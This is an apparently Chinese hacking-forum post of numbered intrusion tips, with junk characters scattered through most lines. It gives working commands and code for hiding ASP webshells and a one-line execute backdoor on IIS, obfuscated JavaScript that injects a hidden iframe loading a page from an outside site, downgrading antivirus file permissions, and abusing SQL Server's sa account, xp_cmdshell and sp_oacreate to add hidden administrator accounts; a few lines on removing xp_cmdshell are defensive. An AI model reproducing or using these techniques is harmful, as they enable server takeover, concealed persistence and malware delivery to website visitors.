! S+ L$ T) y2 v, Q3 w( P
. C2 v; w4 |, ^( Z53、隐藏ASP后门的两种方法4 W. h7 g( d' y! y, @$ I
1、建立非标准目录:mkdir images..\7 F/ t7 n* b# F/ L, Z% l# B
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
; t T' m$ x* f! e$ Z# e- R通过web访问ASP木马:http://ip/images../news.asp?action=login
3 Y) N6 @3 M. B7 e2 R8 M; Y如何删除非标准目录:rmdir images..\ /s Q- g6 K- H2 z9 d! I
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
9 s3 S/ m8 H" C2 e( Cmkdir programme.asp
4 m9 O* \! ^7 n F新建1.txt文件内容:<!--#include file=”12.jpg”-->
0 M9 u+ v2 e1 s* i9 q) g新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
. E' U# q# i; x( `$ qattrib +H +S programme.asp9 E" v; d! M: N: w# u8 n3 Z
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt4 i7 E$ n \* k! @5 E* B
z( F: t2 K A6 r" g0 M; A- S54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
. E8 I/ j B! q% `然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。 f' `" F$ \6 ]! O: }/ H
1 g0 O$ [* q7 m" p6 J# N( Z
55、JS隐蔽挂马
/ Y3 w% o' |+ X. j. M1.
% i8 Y/ y! a. b3 x/ avar tr4c3="<iframe src=ht";0 F; O9 T+ w* t- f1 I& q
tr4c3 = tr4c3+"tp:/";
# X: o8 z1 Y# |3 p/ Rtr4c3 = tr4c3+"/ww";
! m! \7 ^7 X! T0 etr4c3 = tr4c3+"w.tr4";8 L8 l$ r1 w/ J( [
tr4c3 = tr4c3+"c3.com/inc/m";
) S9 X2 B; \7 h' f) `. w+ Ytr4c3 = tr4c3+"m.htm style="display:none"></i";+ e0 U3 j- S; C" F
tr4c3 =tr4c3+"frame>'";( Z* e3 e4 p& J$ E% o% h% g
document.write(tr4c3);* [. C+ @$ o, F- {+ }+ n
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
% w6 W# | d. ~, X" `) Q
7 W' u3 D' ]2 c5 t2.
& q0 r# X2 i) C# p5 I( n转换进制,然后用EVAL执行。如
) I& l$ s; U! r* P9 Neval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
3 X" K8 g5 W8 w( s# T+ _不过这个有点显眼。
3 K/ |/ @3 r y9 I& _: I3.; d2 J0 Z; N" |( T% ]
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
b2 p9 s6 l6 m最后一点,别忘了把文件的时间也修改下。
7 T7 z/ G2 E8 v) d- s6 ^7 f# T+ T( Q; K: V. B1 U1 f& S
56.3389终端入侵常用DOS命令
* ~# _, |. I- ]9 k) G0 d9 t( Ltaskkill taskkill /PID 1248 /t" Z2 ]1 P: A. u* ~% ~. h
8 z9 x( D/ j/ N+ E9 s I
tasklist 查进程
& H R, D8 Q6 d! g% _1 K) k1 R1 S6 T% x; f3 Y9 W
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
V D1 _9 I1 s6 j9 u7 C* C+ g& |iisreset /reboot
2 L: n, x: U1 g2 V9 K( w6 l0 Ttsshutdn /reboot /delay:1 重起服务器6 a( I* p- C1 ~( o. s
* A- N# d" E. i
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,5 Q. b; v3 Y2 z
0 ]3 j. o+ k; z7 a- rquery user 查看当前终端用户在线情况: L1 @0 a5 G+ s* G% F5 X& g
: k- G7 C, |9 G0 x
要显示有关所有会话使用的进程的信息,请键入:query process *! m+ z6 n: C/ r: S$ ~! y* U5 i
, N* T0 _8 e$ l# c6 U6 [ H8 @要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
$ z; Z5 y P' x, ?" G" V
8 U ~; d3 r+ H: G% l! n( x" t要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2' S4 v( f# V. |4 ^7 C6 s
, p- S& z* M- x8 u$ ]要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
7 z2 [" Q1 J M6 g+ z/ e7 q
& U& X V& n, @5 r命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
6 r( Z& Z* F( w' G0 q6 [% P+ i5 b( s0 H P; y, S
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
& s3 l# g2 A7 s* F z& ]$ U [5 l* U q) j, O
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。; c* Q% m' t" ^4 H* J& `
, d4 {2 L, B: _7 c命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机6 E0 a l1 C! D8 a
4 \; m8 q5 w: J2 M
56、在地址栏或按Ctrl+O,输入:
0 g0 U$ j6 b9 X5 B( h# N; `8 I4 {javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
/ ~1 o% A4 E. S' I/ d$ E* g& I9 U' ^: U8 j
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。- A3 J3 Z' U( y1 R9 h
( Z1 I+ \6 ?* G( J57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
) \- a' {1 h6 T; N( A" r0 P# R/ l用net localgroup administrators是可以看到管理组下,加了$的用户的。& @2 U! \1 Q3 b& H( j. s/ g
( H9 k( P( E, h% i, ]9 F58、 sa弱口令相关命令5 j* {& V) y' z( C+ s
0 G/ \1 N7 ^# E' c, j; v, L
一.更改sa口令方法:
1 |3 T8 a! j5 f用sql综合利用工具连接后,执行命令:
- E# V' K1 O: zexec sp_password NULL,'20001001','sa'
2 d, ?" o: @* u5 j' Q! H(提示:慎用!)9 i0 d6 t m/ Z- V0 |/ W1 K6 o' R P
8 X0 @% y& \8 h, \8 b5 k
二.简单修补sa弱口令./ T+ y2 m- K. K
5 k, S' v0 A; A
方法1:查询分离器连接后执行:
. b; z3 W$ V% s! Q1 xif exists (select * from
1 N! R+ L* ]# W. V. p% a- bdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and9 A. m; J; O4 p/ v. ^% [
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)8 b! u' a4 }4 Q0 J; U0 k
4 ~7 Z( Q( k( b' V* b3 x6 Yexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
, _( Z$ |0 t' B) p& L
! |: ]& b% e" `4 `GO$ \( d9 W9 a1 H" p9 b1 W
' u* O( @4 {9 L: T6 i然后按F5键命令执行完毕4 Z: _ K3 _/ |1 T% u. h- \
A2 h0 d3 U' N9 c% i9 k方法2:查询分离器连接后- {# z N7 p. R* g
第一步执行:use master
0 a: @# r: @0 [/ A第二步执行:sp_dropextendedproc 'xp_cmdshell'3 \7 | Y. x9 B, H. b0 `$ n
然后按F5键命令执行完毕
: `* z. {" G; V' _, }3 v. l1 u; g! h1 |( j
7 C3 {( V( t0 U$ D
三.常见情况恢复执行xp_cmdshell.
; V9 l2 J( Q7 F
: q# r$ ?5 q2 L7 e* g! N9 U( e& [7 i7 D% Z8 C' v; }: Z
1 未能找到存储过程'master..xpcmdshell'.
, W4 v9 {$ ]1 E, A; @+ J8 a. U 恢复方法:查询分离器连接后,
. Q3 D6 a- s, m* v" N( ?第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
$ f7 V7 I" [6 u7 Z第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
/ X) r6 p0 [, }/ v5 @' Z然后按F5键命令执行完毕& Y1 a9 d7 [6 h3 S3 R5 k
) q# s* K x- ]
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
/ T3 C% Z8 w* m恢复方法:查询分离器连接后,
! u7 I, D3 i) P% k) N第一步执行:sp_dropextendedproc "xp_cmdshell"5 `5 e/ {2 N) L r7 V
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
# I+ u9 M/ v# ^1 S4 v然后按F5键命令执行完毕" g7 ]* w l% T% i
! b+ v2 f$ q! L4 n7 A S( B3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)5 L7 `8 b" f7 `# n4 P" }
恢复方法:查询分离器连接后,+ Q- o& A3 g& O/ s
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'8 u% P) |7 Y! n) ^2 ]
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
3 ?! T9 W6 o1 ]1 ?9 a2 E* [, |然后按F5键命令执行完毕
3 F( I1 i6 u, t1 G
7 B" V: J ^: e% U2 x% _6 _四.终极方法.
4 u3 f9 z0 |* ^如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
/ s. ]3 S! e c: ^! y5 L查询分离器连接后,
9 |/ c: X4 a I( d; v2000servser系统:
. y' o! ?. X& h$ rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
3 d0 j% T+ U8 T# e; V4 y2 \/ I
# m* U) {, C) K- C4 O0 Z) [declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'7 n" P0 }* X0 u, J# A
8 o( d3 p3 Q, mxp或2003server系统:
, \3 N5 K' @0 t5 C" @' M- o- }; f; T; v n$ ^3 p9 q4 V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
2 T) \6 _" L/ J; i/ P. n& w7 `* U1 d, s6 K' N ]3 s1 v
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'+ m4 h: T/ n" K) c
|
发表于 2012-9-15 14:51:03
收藏
支持
反对